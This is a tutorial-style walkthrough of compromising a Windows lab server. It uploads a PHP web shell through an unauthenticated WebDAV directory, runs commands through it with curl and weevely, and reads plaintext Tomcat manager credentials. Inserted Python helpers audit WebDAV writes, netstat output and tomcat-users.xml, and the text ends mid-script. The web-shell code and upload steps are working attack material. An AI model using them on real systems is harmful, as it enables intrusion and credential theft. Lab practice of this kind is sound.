Submitted by Edu4rdSHL on Mon, 07/01/2019 - 15:27
Windows server pwned

Vulnerabilities are often found where you least expect them, and today we are going to show you why. Misconfigurations by system administrators are among the most common causes of successful attacks on servers.

For this test we will use:

1. Victim - A virtual machine running a Windows Server 2008 R2 web server; the web server will be listening on port 8585.

2. Attacker - A BlackArch Linux virtual machine, a distribution specialised for hacking. This machine will be operated over SSH.

We normally perform exploitation with Metasploit (see the Metasploit articles); today we will do it without Metasploit, using these tools instead: cadaver, weevely and curl.

· Scanning the victim machine

As always, every exploitation process must begin by learning as much as possible about the victim, so we will launch a scan with nmap.

[edu4rdshl@blackarch ~]$ nmap -T4 -sV 192.168.1.70 -p 1-10000

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-07 17:20 -05
Nmap scan report for 192.168.1.70
Host is up (0.0031s latency).
Not shown: 9969 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 7.1 (protocol 2.0)
135/tcp  open  msrpc                Microsoft Windows RPC
139/tcp  open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1617/tcp open  rmiregistry          Java RMI
3000/tcp open  http                 WEBrick httpd 1.3.1 (Ruby 2.3.3 (2016-11-21))
3306/tcp open  mysql                MySQL 5.5.20-log
3389/tcp open  ms-wbt-server        Microsoft Terminal Service
3700/tcp open  giop                 CORBA naming service
4848/tcp open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
5985/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7676/tcp open  java-message-service Java Message Service 301
8009/tcp open  ajp13                Apache Jserv (Protocol v1.3)
8019/tcp open  qbdb?
8020/tcp open  http                 Apache httpd
8022/tcp open  http                 Apache Tomcat/Coyote JSP engine 1.1
8027/tcp open  unknown
8028/tcp open  postgresql           PostgreSQL DB
8031/tcp open  ssl/unknown
8032/tcp open  desktop-central      ManageEngine Desktop Central DesktopCentralServer
8080/tcp open  http                 Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
8181/tcp open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
8282/tcp open  http                 Apache Tomcat/Coyote JSP engine 1.1
8383/tcp open  ssl/http             Apache httpd
8443/tcp open  ssl/https-alt?
8444/tcp open  desktop-central      ManageEngine Desktop Central DesktopCentralServer
8484/tcp open  http                 Jetty winstone-2.8
8585/tcp open  http                 Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
8686/tcp open  rmiregistry          Java RMI
9200/tcp open  http                 Elasticsearch REST API 1.1.1 (name: Infamnia; Lucene 4.7)
9300/tcp open  vrace?
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; Device: remote management; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.12 seconds

As we can see, Apache httpd is running on port 8585, and the banner also advertises DAV/2, meaning mod_dav is loaded. Let's see what is served there.

[Image: server]

[Image: server2]

As we can see, at the bottom there are some folders under "Your projects", in particular one called "Uploads"; let's see what is in it.

[Image: uploads]

Apparently nothing... however, we can use cadaver, a command-line WebDAV client, to test whether we can upload files without authenticating.

First we create a simple PHP shell for testing.

[edu4rdshl@blackarch ~]$ echo '<?php echo shell_exec($_GET['e']); ?>' > shell.php 
[edu4rdshl@blackarch ~]$ cat shell.php 
<?php echo shell_exec($_GET[e]); ?>

Note that the single quotes around `e` close and reopen the shell's quoted string, so the file actually contains `$_GET[e]` (an unquoted constant, which PHP 5.3 accepts with a notice and treats as the string "e"); it still works. Now we will try to upload it with cadaver.

[edu4rdshl@blackarch ~]$ cadaver http://192.168.1.70:8585/uploads/
dav:/uploads/> put shell.php 
Uploading shell.php to `/uploads/shell.php':
Progress: [=============================>] 100.0% of 36 bytes succeeded.
dav:/uploads/> 

As we can see, it was uploaded successfully: the DAV-enabled directory accepts PUT without any authentication.
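The check cadaver performed by hand can be scripted. The following is an added example, not code from the original post: it sends OPTIONS to read the advertised DAV methods and then PUTs a harmless, randomly named text file (and deletes it again) to get a definitive answer. The target URL, the sample OPTIONS headers and the marker file name are assumptions; only the standard library is used.

```python
"""Check whether a WebDAV directory accepts unauthenticated writes.

Added example (not code from the original post). It assumes a plain-HTTP
target such as http://192.168.1.70:8585/uploads/; the parsing and verdict
helpers run offline on the constructed sample below.
"""
import http.client
import sys
import uuid
from urllib.parse import urlparse

# Constructed sample: headers shaped like an Apache mod_dav OPTIONS reply.
SAMPLE_OPTIONS_HEADERS = {
    "DAV": "1,2,<http://apache.org/dav/propset/fs/1>",
    "MS-Author-Via": "DAV",
    "Allow": "OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK",
}

WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH", "LOCK", "UNLOCK"}


def dav_write_methods(headers):
    """Write-capable WebDAV methods advertised in an OPTIONS reply.

    `headers` maps header name -> value (matched case-insensitively).  An
    empty set means no DAV header or no write methods in Allow.  Apache may
    omit PUT from Allow for a collection even when PUT works on its members,
    so treat this as a hint and confirm with probe_unauthenticated_put().
    """
    lower = {k.lower(): v for k, v in headers.items()}
    if "dav" not in lower:
        return set()
    allowed = {m.strip().upper() for m in lower.get("allow", "").split(",")}
    return allowed & WRITE_METHODS


def interpret_put_status(status):
    """Verdict for the status code of an unauthenticated PUT."""
    if status in (201, 204):
        return "writable-without-auth"   # file was created or overwritten
    if status == 401:
        return "auth-required"           # DAV is there but protected
    if status in (403, 405):
        return "put-denied"
    return "unexpected-%d" % status


def fetch_options_headers(base_url, timeout=5):
    """OPTIONS request against base_url; returns the response headers as a dict."""
    u = urlparse(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    try:
        conn.request("OPTIONS", u.path or "/")
        resp = conn.getresponse()
        resp.read()
        return dict(resp.getheaders())
    finally:
        conn.close()


def probe_unauthenticated_put(base_url, timeout=5):
    """PUT a harmless, randomly named marker under base_url, then delete it.

    Returns (verdict, marker_name).  Only a text file is written, so the
    check leaves nothing executable behind even if the DELETE fails.
    """
    u = urlparse(base_url)
    path = u.path if u.path.endswith("/") else u.path + "/"
    marker = "davcheck-%s.txt" % uuid.uuid4().hex[:12]   # assumed marker name
    body = b"webdav write check\n"
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    try:
        conn.request("PUT", path + marker, body=body,
                     headers={"Content-Type": "text/plain"})
        resp = conn.getresponse()
        resp.read()
        verdict = interpret_put_status(resp.status)
        if verdict == "writable-without-auth":
            conn.request("DELETE", path + marker)   # clean up the marker
            conn.getresponse().read()
        return verdict, marker
    finally:
        conn.close()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.70:8585/uploads/"
    print("advertised write methods:", sorted(dav_write_methods(fetch_options_headers(target))))
    print("unauthenticated PUT:", probe_unauthenticated_put(target))
```

A 201 on the probe is the finding: anyone can drop a PHP file into a directory the same Apache instance executes. The fix on the Apache side is either `Dav Off` for that directory or, if WebDAV is really needed, restricting the write methods with `<LimitExcept GET HEAD OPTIONS PROPFIND> Require valid-user </LimitExcept>` behind a configured AuthType, and in any case serving the upload directory with script execution disabled.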

[Image: shell]

Now let's see whether we can run commands on the remote system through the shell. For that we will use curl.

[edu4rdshl@blackarch ~]$ curl http://192.168.1.70:8585/uploads/shell.php?e=ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::18a4:8538:d3fd:ee3%14
   Autoconfiguration IPv4 Address. . : 169.254.14.227
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : une.net.co
   Link-local IPv6 Address . . . . . : fe80::249f:86a9:a00f:37ae%11
   IPv4 Address. . . . . . . . . . . : 192.168.1.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.254

Tunnel adapter isatap.une.net.co:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : une.net.co

Tunnel adapter isatap.{E6F260CB-58D5-4831-8472-57C62CD0DD0B}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

As we can see, it really works.

Now we will use weevely to create a semi-interactive, password-protected web shell, and then use cadaver again to upload it to the server.

[edu4rdshl@blackarch ~]$ weevely generate sechacklabs123 /home/edu4rdshl/interactive.php
Generated '/home/edu4rdshl/interactive.php' with password 'sechacklabs123' of 759 byte size.

[edu4rdshl@blackarch ~]$ cadaver http://192.168.1.70:8585/uploads/
dav:/uploads/> put interactive.php 
Uploading interactive.php to `/uploads/interactive.php':
Progress: [=============================>] 100.0% of 759 bytes succeeded.

Next we connect to the shell with weevely.

[edu4rdshl@blackarch ~]$ weevely http://192.168.1.70:8585/uploads/interactive.php sechacklabs123

[+] weevely 3.7.0

[+] Target:	192.168.1.70:8585
[+] Session:	/home/edu4rdshl/.weevely/sessions/192.168.1.70/interactive_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 

Once at this point, we run any of the commands available in weevely and the tool will try to give us the shell.

weevely> whoami
nt authority\local service
metasploitable3-win2k8:C:\wamp\www\uploads $

There we have the shell; note that we are running as NT AUTHORITY\LOCAL SERVICE, the account the WAMP Apache service runs under. Let's look at the active connections.

metasploitable3-win2k8:C:\wamp\www\uploads $ netstat -ant

Active Connections

  Proto  Local Address          Foreign Address        State           Offload State

  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3000           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8019           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8020           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8022           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8031           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8032           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8383           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8444           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8585           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49160          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49191          0.0.0.0:0              LISTENING       InHost      
  TCP    127.0.0.1:8009         127.0.0.1:49350        TIME_WAIT       InHost      
  TCP    127.0.0.1:8019         127.0.0.1:49286        ESTABLISHED     InHost      
  TCP    127.0.0.1:8022         127.0.0.1:49343        CLOSE_WAIT      InHost      
  TCP    127.0.0.1:8282         127.0.0.1:49349        TIME_WAIT       InHost      
  TCP    127.0.0.1:31000        127.0.0.1:32000        TIME_WAIT       InHost      
  TCP    127.0.0.1:32000        0.0.0.0:0              LISTENING       InHost      
  TCP    127.0.0.1:49155        127.0.0.1:49156        TIME_WAIT       InHost      
  TCP    127.0.0.1:49161        127.0.0.1:49162        TIME_WAIT       InHost      
  TCP    127.0.0.1:49163        127.0.0.1:49164        TIME_WAIT       InHost      
  TCP    127.0.0.1:49165        127.0.0.1:49166        TIME_WAIT       InHost      
  TCP    127.0.0.1:49167        127.0.0.1:49168        TIME_WAIT       InHost      
  TCP    127.0.0.1:49169        127.0.0.1:49170        TIME_WAIT       InHost      
  TCP    127.0.0.1:49171        127.0.0.1:49172        TIME_WAIT       InHost      
  TCP    127.0.0.1:49173        127.0.0.1:49174        TIME_WAIT       InHost      
  TCP    127.0.0.1:49175        127.0.0.1:49176        TIME_WAIT       InHost      
  TCP    127.0.0.1:49177        127.0.0.1:49178        TIME_WAIT       InHost      
  TCP    127.0.0.1:49180        127.0.0.1:49181        TIME_WAIT       InHost      
  TCP    127.0.0.1:49208        127.0.0.1:49209        TIME_WAIT       InHost      
  TCP    127.0.0.1:49210        127.0.0.1:49211        TIME_WAIT       InHost      
  TCP    127.0.0.1:49212        127.0.0.1:49213        TIME_WAIT       InHost      
  TCP    127.0.0.1:49214        127.0.0.1:49215        TIME_WAIT       InHost      
  TCP    127.0.0.1:49216        127.0.0.1:49217        TIME_WAIT       InHost      
  TCP    127.0.0.1:49218        127.0.0.1:49219        TIME_WAIT       InHost      
  TCP    127.0.0.1:49220        127.0.0.1:49221        TIME_WAIT       InHost      
  TCP    127.0.0.1:49222        127.0.0.1:49223        TIME_WAIT       InHost      
  TCP    127.0.0.1:49224        127.0.0.1:49225        TIME_WAIT       InHost      
  TCP    127.0.0.1:49226        127.0.0.1:49227        TIME_WAIT       InHost      
  TCP    127.0.0.1:49228        127.0.0.1:49229        TIME_WAIT       InHost      
  TCP    127.0.0.1:49230        127.0.0.1:49231        TIME_WAIT       InHost      
  TCP    127.0.0.1:49232        127.0.0.1:49233        TIME_WAIT       InHost      
  TCP    127.0.0.1:49234        127.0.0.1:49235        TIME_WAIT       InHost      
  TCP    127.0.0.1:49236        127.0.0.1:49237        TIME_WAIT       InHost      
  TCP    127.0.0.1:49238        127.0.0.1:49239        TIME_WAIT       InHost      
  TCP    127.0.0.1:49240        127.0.0.1:49241        TIME_WAIT       InHost      
  TCP    127.0.0.1:49242        127.0.0.1:49243        TIME_WAIT       InHost      
  TCP    127.0.0.1:49244        127.0.0.1:49245        TIME_WAIT       InHost      
  TCP    127.0.0.1:49246        127.0.0.1:49247        TIME_WAIT       InHost      
  TCP    127.0.0.1:49248        127.0.0.1:49249        TIME_WAIT       InHost      
  TCP    127.0.0.1:49250        127.0.0.1:49251        TIME_WAIT       InHost      
  TCP    127.0.0.1:49260        127.0.0.1:49261        TIME_WAIT       InHost      
  TCP    127.0.0.1:49262        127.0.0.1:49263        TIME_WAIT       InHost      
  TCP    127.0.0.1:49264        127.0.0.1:49265        TIME_WAIT       InHost      
  TCP    127.0.0.1:49266        127.0.0.1:49267        TIME_WAIT       InHost      
  TCP    127.0.0.1:49271        127.0.0.1:49272        ESTABLISHED     InHost      
  TCP    127.0.0.1:49272        127.0.0.1:49271        ESTABLISHED     InHost      
  TCP    127.0.0.1:49274        127.0.0.1:49275        ESTABLISHED     InHost      
  TCP    127.0.0.1:49275        127.0.0.1:49274        ESTABLISHED     InHost      
  TCP    127.0.0.1:49276        127.0.0.1:49277        ESTABLISHED     InHost      
  TCP    127.0.0.1:49277        127.0.0.1:49276        ESTABLISHED     InHost      
  TCP    127.0.0.1:49286        127.0.0.1:8019         ESTABLISHED     InHost      
  TCP    127.0.0.1:49343        127.0.0.1:8022         FIN_WAIT_2      InHost      
  TCP    127.0.0.1:49351        127.0.0.1:8028         SYN_SENT        InHost      
  TCP    127.0.0.1:49352        127.0.0.1:8028         SYN_SENT        InHost      
  TCP    127.0.0.1:49353        127.0.0.1:8028         SYN_SENT        InHost      
  TCP    169.254.14.227:139     0.0.0.0:0              LISTENING       InHost      
  TCP    192.168.1.70:139       0.0.0.0:0              LISTENING       InHost      
  TCP    192.168.1.70:8032      192.168.1.67:43464     LAST_ACK        InHost      
  TCP    192.168.1.70:8444      192.168.1.67:55492     LAST_ACK        InHost      
  TCP    192.168.1.70:8585      192.168.1.67:56508     TIME_WAIT       InHost      
  TCP    192.168.1.70:8585      192.168.1.67:56510     ESTABLISHED     InHost      
  TCP    192.168.1.70:49157     192.168.1.67:35512     LAST_ACK        InHost      
  TCP    192.168.1.70:49157     192.168.1.67:36944     LAST_ACK        InHost      
  TCP    192.168.1.70:49195     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49196     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49197     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49198     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49199     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49200     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49201     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49202     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49203     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49204     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49205     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49206     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49207     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49344     8.39.54.107:443        TIME_WAIT       InHost      
  TCP    [::]:22                [::]:0                 LISTENING       InHost      
  TCP    [::]:135               [::]:0                 LISTENING       InHost      
  TCP    [::]:445               [::]:0                 LISTENING       InHost      
  TCP    [::]:8019              [::]:0                 LISTENING       InHost      
  TCP    [::]:8020              [::]:0                 LISTENING       InHost      
  TCP    [::]:8031              [::]:0                 LISTENING       InHost      
  TCP    [::]:8032              [::]:0                 LISTENING       InHost      
  TCP    [::]:8383              [::]:0                 LISTENING       InHost      
  TCP    [::]:8443              [::]:0                 LISTENING       InHost      
  TCP    [::]:8444              [::]:0                 LISTENING       InHost      
  TCP    [::]:8585              [::]:0                 LISTENING       InHost      
  TCP    [::]:49152             [::]:0                 LISTENING       InHost      
  TCP    [::]:49153             [::]:0                 LISTENING       InHost      
  TCP    [::]:49154             [::]:0                 LISTENING       InHost      
  TCP    [::]:49157             [::]:0                 LISTENING       InHost      
  TCP    [::]:49160             [::]:0                 LISTENING       InHost      
  TCP    [::]:49191             [::]:0                 LISTENING       InHost      
  UDP    0.0.0.0:5355           *:*                                                
  UDP    169.254.14.227:137     *:*                                                
  UDP    169.254.14.227:138     *:*                                                
  UDP    192.168.1.70:137       *:*                                                
  UDP    192.168.1.70:138       *:*                                                
  UDP    [::]:5355              *:*                                                
  UDP    [::]:56162             *:*                                                
metasploitable3-win2k8:C:\wamp\www\uploads $ 
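Reading a listing this long by eye is error-prone, so the following added example (not part of the original post) parses `netstat -ant` output and separates services exposed on every interface from those bound only to loopback, which are the ones that would need a port forward to reach from the attacking machine, and lists non-local peers. The embedded sample is a constructed subset of the listing above; the host's own IP is passed in as an assumption.

```python
"""Triage `netstat -ant` output from a compromised Windows host.

Added example, not part of the original post.  It separates services exposed
on every interface from those bound only to loopback (reachable from the
attacker only through a port forward) and lists non-local peers.  The sample
below is a constructed subset of the listing above.
"""
import re

SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           Offload State

  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       InHost
  TCP    0.0.0.0:8585           0.0.0.0:0              LISTENING       InHost
  TCP    127.0.0.1:32000        0.0.0.0:0              LISTENING       InHost
  TCP    127.0.0.1:49286        127.0.0.1:8019         ESTABLISHED     InHost
  TCP    192.168.1.70:139       0.0.0.0:0              LISTENING       InHost
  TCP    192.168.1.70:8585      192.168.1.67:56510     ESTABLISHED     InHost
  TCP    192.168.1.70:49344     8.39.54.107:443        TIME_WAIT       InHost
  TCP    [::]:22                [::]:0                 LISTENING       InHost
  UDP    0.0.0.0:5355           *:*
"""

ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?")


def split_endpoint(ep):
    """'[::]:22' -> ('::', 22); '0.0.0.0:0' -> ('0.0.0.0', 0); '*:*' -> ('*', None)."""
    host, _, port = ep.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def is_wildcard(host):
    return host in ("0.0.0.0", "::")


def is_loopback(host):
    return host == "::1" or host.startswith("127.")


def parse_netstat(text):
    """Return a list of (proto, (lhost, lport), (fhost, fport), state) per socket row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            proto, local, foreign, state = m.groups()
            rows.append((proto, split_endpoint(local), split_endpoint(foreign), state or ""))
    return rows


def triage(rows, host_ips=()):
    """Classify listeners and collect remote peers.

    host_ips: the machine's own interface addresses (assumed input), so a
    listener bound to one interface (192.168.1.70:139) counts as exposed and
    a connection from the host to itself is not reported as a remote peer.
    """
    result = {"exposed": set(), "loopback_only": set(), "remote_peers": set()}
    for proto, (lhost, lport), (fhost, fport), state in rows:
        listening = state == "LISTENING" or (proto == "UDP" and fhost == "*")
        if listening:
            if is_wildcard(lhost) or lhost in host_ips:
                result["exposed"].add((proto, lport))
            elif is_loopback(lhost):
                result["loopback_only"].add((proto, lport))
        elif fport is not None and not (is_loopback(fhost) or is_wildcard(fhost) or fhost in host_ips):
            result["remote_peers"].add((fhost, fport, state))
    # A port that also has a wildcard listener is not loopback-only.
    result["loopback_only"] -= result["exposed"]
    return result


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSTAT
    t = triage(parse_netstat(text), host_ips=("192.168.1.70",))
    for key in ("exposed", "loopback_only", "remote_peers"):
        print(key, sorted(t[key]))
```

Pipe the real listing in (`weevely` can save it to a file) and the loopback-only set is exactly the list of candidates for a port forward later on; the remote-peer set is worth a look for the same reason a defender would look at it, since it shows who the box is talking to.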

I took a look at the other services installed. Browsing the "Apache Software Foundation" directory, we found a Tomcat installation together with the tomcat-users.xml file, which holds plaintext credentials for the Tomcat manager.

metasploitable3-win2k8:C:\wamp\www\uploads $ cd "C:\Program Files"

metasploitable3-win2k8:C:\Program Files $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files

09/30/2018  01:36 AM    <DIR>          .
09/30/2018  01:36 AM    <DIR>          ..
09/30/2018  01:18 AM    <DIR>          7-Zip
09/30/2018  01:21 AM    <DIR>          Apache Software Foundation
07/13/2009  07:20 PM    <DIR>          Common Files
09/30/2018  01:37 AM    <DIR>          elasticsearch-1.1.1
11/20/2010  07:33 PM    <DIR>          Internet Explorer
09/30/2018  01:21 AM    <DIR>          Java
09/30/2018  01:23 AM    <DIR>          jenkins
09/30/2018  01:24 AM    <DIR>          jmx
09/30/2018  01:12 AM    <DIR>          OpenSSH
09/30/2018  01:15 AM    <DIR>          Oracle
09/30/2018  01:26 AM    <DIR>          Rails_Server
11/20/2010  07:33 PM    <DIR>          Windows Mail
07/13/2009  09:37 PM    <DIR>          Windows NT
09/30/2018  01:15 AM    <DIR>          WindowsPowerShell
09/30/2018  01:24 AM    <DIR>          wordpress
               0 File(s)              0 bytes
              17 Dir(s)  48,053,305,344 bytes free

metasploitable3-win2k8:C:\Program Files $ cd "Apache Software Foundation"

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation

09/30/2018  01:21 AM    <DIR>          .
09/30/2018  01:21 AM    <DIR>          ..
09/30/2018  01:21 AM    <DIR>          tomcat
               0 File(s)              0 bytes
               3 Dir(s)  48,053,084,160 bytes free

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation $ cd tomcat

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation\tomcat

09/30/2018  01:21 AM    <DIR>          .
09/30/2018  01:21 AM    <DIR>          ..
03/18/2016  07:33 PM    <DIR>          apache-tomcat-8.0.33
               0 File(s)              0 bytes
               3 Dir(s)  48,053,026,816 bytes free

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat $ cd apache-tomcat-8.0.33

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33 $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33

03/18/2016  07:33 PM    <DIR>          .
03/18/2016  07:33 PM    <DIR>          ..
03/18/2016  07:32 PM    <DIR>          bin
09/30/2018  01:21 AM    <DIR>          conf
03/18/2016  07:32 PM    <DIR>          lib
03/18/2016  07:32 PM            58,068 LICENSE
01/07/2019  12:19 PM    <DIR>          logs
03/18/2016  07:32 PM             1,489 NOTICE
03/18/2016  07:32 PM             6,911 RELEASE-NOTES
03/18/2016  07:32 PM            16,671 RUNNING.txt
01/07/2019  03:15 PM    <DIR>          temp
09/30/2018  01:36 AM    <DIR>          webapps
03/18/2016  07:31 PM    <DIR>          work
               4 File(s)         83,139 bytes
               9 Dir(s)  48,052,674,560 bytes free

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33 $ cd conf

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf

09/30/2018  01:21 AM    <DIR>          .
09/30/2018  01:21 AM    <DIR>          ..
09/30/2018  01:21 AM    <DIR>          Catalina
03/18/2016  07:32 PM            12,624 catalina.policy
03/18/2016  07:32 PM             7,251 catalina.properties
03/18/2016  07:32 PM             1,613 context.xml
03/18/2016  07:32 PM             3,451 logging.properties
09/30/2018  01:14 AM             6,457 server.xml
09/30/2018  01:14 AM             2,309 tomcat-users.xml
03/18/2016  07:32 PM             2,692 tomcat-users.xsd
03/18/2016  07:32 PM           173,514 web.xml
               8 File(s)        209,911 bytes
               3 Dir(s)  48,051,527,680 bytes free
metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ 

Let's look at the content of tomcat-users.xml.

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ type tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
  <role rolename="manager-gui"/>
  <user username="sploit" password="sploit" roles="manager-gui"/>
</tomcat-users>
metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $
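Two things are wrong here: a manager account with a plaintext password equal to its username, and a credentials file readable by the account the WAMP Apache runs as. The first can be audited automatically. The following is an added example, not part of the original post or of Tomcat: it parses a tomcat-users.xml and reports every account holding a manager or admin role whose stored credential is plaintext, trivially guessable, or short. The sample XML is constructed to mirror what was found on the server plus one account with a digested password for contrast; the digest heuristic is an assumption about how Tomcat's MessageDigestCredentialHandler formats values.

```python
"""Audit a tomcat-users.xml for privileged accounts with weak credentials.

Added example, not part of the original post or of Tomcat.  The sample XML
is constructed to mirror what was found on the server (the `sploit` user)
plus one account with a digested password for contrast.
"""
import re
import xml.etree.ElementTree as ET

# Roles that grant deploy/JMX/admin access through the manager and host-manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Heuristic shape of a MessageDigestCredentialHandler value: a hex digest,
# optionally prefixed by "salt$iterations$".  A plaintext password that
# happens to be 32+ hex characters would be misclassified; accept that.
DIGEST_RE = re.compile(r"^(?:[0-9a-f]+\$\d+\$)?[0-9a-f]{32,}$", re.IGNORECASE)

SAMPLE_TOMCAT_USERS = """<?xml version='1.0' encoding='utf-8'?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="sploit" password="sploit" roles="manager-gui"/>
  <user username="deployer"
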